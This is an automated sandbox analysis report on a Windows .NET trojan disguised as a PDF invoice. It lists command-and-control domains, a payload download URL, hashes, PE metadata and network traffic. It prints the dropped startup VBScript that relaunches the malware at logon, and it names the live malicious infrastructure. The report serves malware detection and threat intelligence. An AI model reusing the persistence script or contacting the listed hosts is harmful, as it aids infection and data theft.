              SourceDetectionScannerLabelLink
              bin12.ydns.eu0%Avira URL Cloudsafe
              bin14.ydns.eu0%Avira URL Cloudsafe
              http://win32.ydns.eu0%Avira URL Cloudsafe
              http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp31vmo/0%Avira URL Cloudsafe
              smfcs1.ydns.eu0%Avira URL Cloudsafe
              kingsbkup1.ydns.eu0%Avira URL Cloudsafe
              http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp30%Avira URL Cloudsafe
              smfcs3.ydns.eu0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              win32.ydns.eu
              		45.144.214.104
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                smfcs3.ydns.eutrue
                • Avira URL Cloud: safe
                		unknown
                kingsbkup1.ydns.eutrue
                • Avira URL Cloud: safe
                		unknown
                bin14.ydns.eutrue
                • Avira URL Cloud: safe
                		unknown
                bin12.ydns.eutrue
                • Avira URL Cloud: safe
                		unknown
                smfcs1.ydns.eutrue
                • Avira URL Cloud: safe
                		unknown
                http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3false
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/mgravell/protobuf-netiFFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://stackoverflow.com/q/14436606/23354FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/mgravell/protobuf-netJFFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp31vmo/FFDOC-2025210 pdf.exe, Current.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://stackoverflow.com/q/11564914/23354;FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/2152978/23354FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://win32.ydns.euFFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netFFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              45.144.214.104
                              		win32.ydns.euUkraine
                              		47169HPC-MVM-ASHUfalse

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1628887
                              Start date and time:2025-03-04 08:57:19 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 26s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:FFDOC-2025210 pdf.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@4/3@1/1
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 70
                              • Number of non-executed functions: 5
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.76, 20.109.210.53
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target FFDOC-2025210 pdf.exe, PID 2276 because it is empty
                              • Execution Graph export aborted for target FFDOC-2025210 pdf.exe, PID 6484 because it is empty
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:58:02Task SchedulerRun new task: {9F6496BB-A1E8-4536-A946-31CD593E6709} path: .
                              08:58:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              45.144.214.104UPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              win32.ydns.euUPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • 45.144.214.104
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              HPC-MVM-ASHUnklarm.elfGet hashmaliciousUnknownBrowse
                              • 45.131.150.251
                              UPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • 45.144.214.104
                              1ZXaFij.exeGet hashmaliciousXmrigBrowse
                              • 45.144.212.77
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              Auftragsbest#U00e4tigung.exeGet hashmaliciousQuasarBrowse
                              • 45.144.214.107
                              IRSTaxRefund.exeGet hashmaliciousDBatLoader, RemcosBrowse
                              • 45.144.214.126
                              SCS AWB and Commercial Invoice.exeGet hashmaliciousSnake Keylogger, XWormBrowse
                              • 45.144.214.104
                              PaRWfF3x5K.elfGet hashmaliciousUnknownBrowse
                              • 45.131.150.253
                              6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                              • 213.181.218.192
                              SoqyJuUVvW.elfGet hashmaliciousMiraiBrowse
                              • 45.131.150.244

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Roaming\Current.exe

                              Download File
                              Process:C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):326656
                              Entropy (8bit):5.6443153945239155
                              Encrypted:false
                              SSDEEP:6144:Lyh4ZwGcFZxO4MvaL7eS7sZXl1YoEhVJGfT/zoMWk:LaZc4MBS7s6sfXotk
                              MD5:D8EA07F0F0072E6AE8AC3B7996941EB7
                              SHA1:24A6D36259CA0D0C89F46411DA822A7F2683BEAF
                              SHA-256:6857D59D1179D9E3745115F7E08CDE964C3CEE54BB91FD891BBA282FE226EB2B
                              SHA-512:7C44F2746117F35E8BD8CF40327390EDFD7A33650A42F3A8E110DE3F1EAC02649EC50988C9BE956968627AF0682E22EDBFA442FBF6F206A770C086289D88BBD3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 32%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.g................................. ... ....@.. .......................`............`.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........o..h............................................................*...(....*..0.......... ........8........E....o.......2...Y...8j.....|......(...+ ....~....{....:....& ....8.......}.... ....~....{....:....& ....8......(....}.... ....8|.....|....(....*..0..{....... ........8........E....2.......1...8-....(....o...... ....~....{....:....& ....8....*..(.... ....~....{s...:....& ....8.....&~.......*...~....*..0..7.........(....}.......}.......}......|......(...+..|....(..

                              C:\Users\user\AppData\Roaming\Current.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                              Download File
                              Process:C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):83
                              Entropy (8bit):4.709822571002774
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHHoUkh4EaKC5+kAHn:FER/lFHI9aZ5+JH
                              MD5:1CD09C4AC57571430505F1B81301A1CE
                              SHA1:480D837BC18F41ECD7C18EB6093C3FFB62567425
                              SHA-256:839A031287D8023A99CB9471E921E7E1E24EFFD01549D8A7372BD5B1E09903E2
                              SHA-512:449E16AE187E61833CC385D3681E35DBB4B969B6892F9945ADEF16F00DF6045D134EDF5B24499B438D597B31148419B50AF6E37C2047494C6A03C465DD881D94
                              Malicious:true
                              Reputation:low
                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Current.exe"""

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):5.6443153945239155
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:FFDOC-2025210 pdf.exe
                              File size:326'656 bytes
                              MD5:d8ea07f0f0072e6ae8ac3b7996941eb7
                              SHA1:24a6d36259ca0d0c89f46411da822a7f2683beaf
                              SHA256:6857d59d1179d9e3745115f7e08cde964c3cee54bb91fd891bba282fe226eb2b
                              SHA512:7c44f2746117f35e8bd8cf40327390edfd7a33650a42f3a8e110de3f1eac02649ec50988c9be956968627af0682e22edbfa442fbf6f206a770c086289d88bbd3
                              SSDEEP:6144:Lyh4ZwGcFZxO4MvaL7eS7sZXl1YoEhVJGfT/zoMWk:LaZc4MBS7s6sfXotk
                              TLSH:6A64B487B98BA9A2E2454776C5DB440043F4DE42739BDB1A3D8E23AB0843FBADD41177
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.g................................. ... ....@.. .......................`............`................................

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0x4511ae
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67C675C6 [Tue Mar 4 03:38:46 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x511600x4b.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x5a8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x4f1b40x4f2002aaa163a966a001677fdf754e177239fFalse0.42658656694312796data5.655960921494257IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x520000x5a80x600ee16c8ef5516362efd6b77d30cb2e5bdFalse0.419921875data4.106331641903978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x540000xc0x20095e81af883e06decba0acf5930f4887fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x520a00x31cdata0.43090452261306533
                              RT_MANIFEST0x523bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Version Infos

                              DescriptionData
                              Translation0x0000 0x04b0
                              Comments
                              CompanyName
                              FileDescriptionDOGGYP10
                              FileVersion1.0.0.0
                              InternalNameDOGGYP10.exe
                              LegalCopyrightCopyright 2015
                              LegalTrademarks
                              OriginalFilenameDOGGYP10.exe
                              ProductNameDOGGYP10
                              ProductVersion1.0.0.0
                              Assembly Version1.0.0.0

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 4, 2025 08:58:12.444008112 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:12.449137926 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:12.449243069 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:12.450103045 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:12.455497026 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171596050 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171641111 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171695948 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171731949 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171755075 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.171766043 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171792030 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.171798944 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171833038 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171847105 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.171868086 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171900988 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171905041 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.171937943 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.171981096 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.177012920 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.177047014 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.177078962 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.177093983 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.217787981 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.302314043 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302350998 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302405119 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302433968 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302480936 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.302541971 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302588940 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.302599907 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302634001 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.302645922 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.303036928 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303072929 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303102016 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.303123951 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303157091 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303169966 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.303193092 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303244114 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.303915024 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303947926 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303982973 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.303993940 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.304014921 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304059029 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.304063082 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304801941 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304852009 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304860115 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.304886103 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304929018 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.304932117 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.304965019 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.305022955 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.305670977 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.358382940 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.433573961 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433645010 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433681011 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433716059 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433765888 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433800936 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433815002 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.433815002 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.433837891 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.433849096 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.434021950 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434071064 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434076071 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.434123039 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434154987 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434171915 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.434189081 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434220076 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434231997 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.434256077 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434303045 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.434869051 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434917927 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434967995 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.434977055 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435002089 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435035944 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435048103 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435067892 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435103893 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435112000 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435749054 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435790062 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435796976 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435841084 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435873032 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435884953 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435909033 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435941935 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.435952902 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.435976982 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436027050 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.436589956 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436640024 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436686993 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.436690092 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436724901 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436757088 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436767101 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.436790943 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436829090 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.436836004 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.437443972 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.437500000 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.564615965 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564646959 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564697027 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564728975 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564800024 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564832926 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564867020 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564867973 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.564868927 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.564902067 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.564905882 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.564954996 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:13.565191031 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.565220118 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:13.565264940 CET4970480192.168.2.545.144.214.104
